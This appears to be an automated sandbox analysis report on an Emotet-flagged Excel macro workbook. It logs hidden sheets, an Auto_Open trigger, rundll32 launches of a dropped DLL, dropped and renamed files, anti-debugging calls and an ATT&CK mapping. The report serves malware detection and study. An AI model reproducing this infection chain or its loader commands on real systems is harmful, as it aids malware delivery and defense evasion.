                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01ECC0EA
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EC40E2
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01ED40FE
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EC46FA
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EC1EFB
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01ED62F5
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01ED4CF5
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EC84F0
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EE20CE
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01ED10CD
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EC92C1
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EC2CC2
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EE1CDB
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EC90D4
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01ED28D5
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01ED52D1
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01ECF48A
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01ECA083
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01ECFE9D
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EDE899
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EDA29B
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01ED009A
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01ED0E97
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EDCE90
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01ED0A93
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EC3A6C
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EC6869
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01ECB464
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01ECEE60
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EC387F
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01ECFA78
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EDB677
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EC544C
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01ECAA4E
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01ED7445
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01ED3043
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01ECAE43
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01ECCE5A
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EC6453
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01ED282D
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EC3228
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EC9824
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EC243F
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EC3432
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EC800A
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EDC205
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EE261E
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E439F10
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4377B4
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E43D530
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E431DE0
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E433A90
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E440380
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E44E3A1
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E436070
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4410C0
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E43A890
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E43E890
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4368B0
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001A243F
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001A9824
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001BEA55
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001AB464
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001C1291
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001C20CE
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001B10CD
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001A92C1
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001B40FE
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001B9124
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001ACF6E
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001B3782
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001BDB87
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001C261E
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001A800A
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001BC205
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001A3432
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001A3228
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001B282D
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001ACE5A
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001A6453
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001AAA4E
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001A544C
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001B3043
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001AAE43
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001B7445
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001AFA78
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001A387F
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001BB677
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001A6869
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001A3A6C
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001AEE60
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001BA29B
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001B009A
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001BE899
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001AFE9D
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001B0A93
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001BCE90
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001B0E97
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001AF48A
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001AA083
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001C1CDB
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001B52D1
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001A90D4
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001B28D5
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001A2CC2
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001A46FA
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001A1EFB
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001A84F0
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001B62F5
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001B4CF5
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001AC0EA
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001B56E9
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001A40E2
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001A4D1E
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001ACB13
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001B970A
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001BE10A
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001B590E
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001B3D0C
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001BBF0C
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001AF73B
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001BCD35
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001AA92F
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001B6540
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001C0370
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001ABD61
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001B1591
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001AB191
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001A7795
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001A358B
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001A8D80
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001A4B81
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001B85B8
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001A43BE
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001A59BF
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001BD7BE
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001BE3B5
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001B89A2
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001BE5A7
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001BDDA5
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001B0BA4
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001A75D2
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001A19C0
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001BEDED
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001A51EC
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001AA3E7
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E44AC90 appears 33 times
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E431DE0 appears 97 times
                        Source: CC82.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
                        Source: DOC-0212.xlsmMacro extractor: Sheet name: Buk2
                        Source: DOC-0212.xlsmMacro extractor: Sheet name: Buk5
                        Source: DOC-0212.xlsmMacro extractor: Sheet name: Buk1
                        Source: DOC-0212.xlsmMacro extractor: Sheet name: Buk7
                        Source: DOC-0212.xlsmMacro extractor: Sheet name: EFEWF
                        Source: DOC-0212.xlsmMacro extractor: Sheet name: Buk3
                        Source: DOC-0212.xlsmMacro extractor: Sheet name: Buk4
                        Source: DOC-0212.xlsmMacro extractor: Sheet name: Buk6
                        Source: workbook.xmlBinary string: \Desktop\Fil\1d\Cir\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{D6BAC37D-0CE8-4F19-A286-32FB1AEC3273}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11160" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="Sheet" sheetId="1" r:id="rId1"/><sheet name="Ss1" sheetId="2" state="hidden" r:id="rId2"/><sheet name="Ss1br2" sheetId="3" state="hidden" r:id="rId3"/><sheet name="Ssbr3" sheetId="4" state="hidden" r:id="rId4"/><sheet name="EFEWF" sheetId="5" state="hidden" r:id="rId5"/><sheet name="Buk1" sheetId="6" state="hidden" r:id="rId6"/><sheet name="Buk2" sheetId="7" state="hidden" r:id="rId7"/><sheet name="Buk3" sheetId="8" state="hidden" r:id="rId8"/><sheet name="Buk4" sheetId="9" state="hidden" r:id="rId9"/><sheet name="Buk5" sheetId="10" state="hidden" r:id="rId10"/><sheet name="Buk6" sheetId="11" state="hidden" r:id="rId11"/><sheet name="Buk7" sheetId="12" state="hidden" r:id="rId12"/></sheets><definedNames><definedName name="LKLW">EFEWF!$D$3</definedName><definedName name="SASA">EFEWF!$D$17</definedName><definedName name="SASA1">EFEWF!$D$19</definedName><definedName name="SASA2">EFEWF!$D$21</definedName><definedName name="_xlnm.Auto_Open">EFEWF!$D$1</definedName></definedNames><calcPr calcId="191029"/><extLst><ext uri="{B58B0392-4F1F-4190-BB64-5DF3571DCE5F}" xmlns:xcalcf="http://schemas.microsoft.com/office/spreadsheetml/2018/calcfeatures"><xcalcf:calcFeatures><xcalcf:feature name="microsoft.com:RD"/><xcalcf:feature name="microsoft.com:FV"/></xcalcf:calcFeatures></ext></extLst></workbook>
                        Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and write
                        Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and write
                        Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and write
                        Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and write
                        Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and write
                        Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and write
                        Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.6051013889
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\besta.ocx",Control_RunDLL
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hisdtuljbeshqtad\zvklxm.vbc",qEPqGlpBy
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.6051013889
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\besta.ocx",Control_RunDLL
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hisdtuljbeshqtad\zvklxm.vbc",qEPqGlpBy
                        Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$DOC-0212.xlsmJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDD92.tmpJump to behavior
                        Source: classification engineClassification label: mal100.troj.expl.evad.winXLSM@8/7@2/2
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.6051013889
                        Source: EXCEL.EXE, 00000000.00000002.752639955.0000000004E90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.555654956.0000000001A80000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694286014.0000000001DE0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747848667.0000000002170000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: DOC-0212.xlsmInitial sample: OLE zip file path = xl/worksheets/sheet4.xml
                        Source: DOC-0212.xlsmInitial sample: OLE zip file path = xl/media/image1.png
                        Source: DOC-0212.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
                        Source: DOC-0212.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet3.xml.rels
                        Source: DOC-0212.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
                        Source: DOC-0212.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
                        Source: DOC-0212.xlsmInitial sample: OLE zip file path = xl/calcChain.xml
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                        Source: CC82.tmp.0.drInitial sample: OLE indicators vbamacros = False
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01EC13E7 push esi; retf
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E456A93 push ecx; ret
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001A13E7 push esi; retf
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E43E690 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,CreateMutexA,CloseHandle,ReleaseMutex,
                        Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Hisdtuljbeshqtad\zvklxm.vbc (copy)Jump to dropped file
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\besta.ocxJump to dropped file
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\VZZdgPFp2xiOJtfpv[1].dllJump to dropped file
                        Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Hisdtuljbeshqtad\zvklxm.vbc (copy)Jump to dropped file
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\besta.ocxJump to dropped file

                        Boot Survival:

                        barindex
                        Drops PE files to the user root directoryShow sources
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\besta.ocxJump to dropped file

                        Hooking and other Techniques for Hiding and Protection:

                        barindex
                        Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                        Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Hisdtuljbeshqtad\zvklxm.vbc:Zone.Identifier read attributes | delete
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\VZZdgPFp2xiOJtfpv[1].dllJump to dropped file
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_025E6753 rdtsc
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E450927 FindFirstFileExW,
                        Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E44AB0C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E43E690 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,CreateMutexA,CloseHandle,ReleaseMutex,
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E431290 GetProcessHeap,HeapAlloc,RtlAllocateHeap,HeapFree,
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_025E6753 rdtsc
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01ED07D2 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E449990 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E44EC0B mov ecx, dword ptr fs:[00000030h]
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4502CC mov eax, dword ptr fs:[00000030h]
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E449920 mov esi, dword ptr fs:[00000030h]
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E449920 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001B07D2 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E44A462 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E44AB0C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E450326 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                        Source: Yara matchFile source: app.xml, type: SAMPLE
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\besta.ocx",Control_RunDLL
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hisdtuljbeshqtad\zvklxm.vbc",qEPqGlpBy
                        Source: EXCEL.EXE, 00000000.00000002.747989999.00000000007F0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747735618.0000000000D70000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                        Source: EXCEL.EXE, 00000000.00000002.747989999.00000000007F0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747735618.0000000000D70000.00000002.00020000.sdmpBinary or memory string: !Progman
                        Source: EXCEL.EXE, 00000000.00000002.747989999.00000000007F0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747735618.0000000000D70000.00000002.00020000.sdmpBinary or memory string: Program Manager<
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E44A584 cpuid
                        Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E44A755 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

                        Stealing of Sensitive Information:

                        barindex
                        Yara detected EmotetShow sources
                        Source: Yara matchFile source: 3.2.rundll32.exe.2ab960.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.rundll32.exe.2ab960.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.rundll32.exe.1ec0000.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.rundll32.exe.1ec0000.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000003.00000002.558061657.0000000001EC0000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.692050034.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.555217971.000000000029D000.00000004.00000020.sdmp, type: MEMORY

                        Mitre Att&ck Matrix

                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                        Valid AccountsScripting1Path InterceptionProcess Injection12Masquerading131OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                        Default AccountsNative API1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySecurity Software Discovery3Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer4Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                        Domain AccountsExploitation for Client Execution43Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSFile and Directory Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
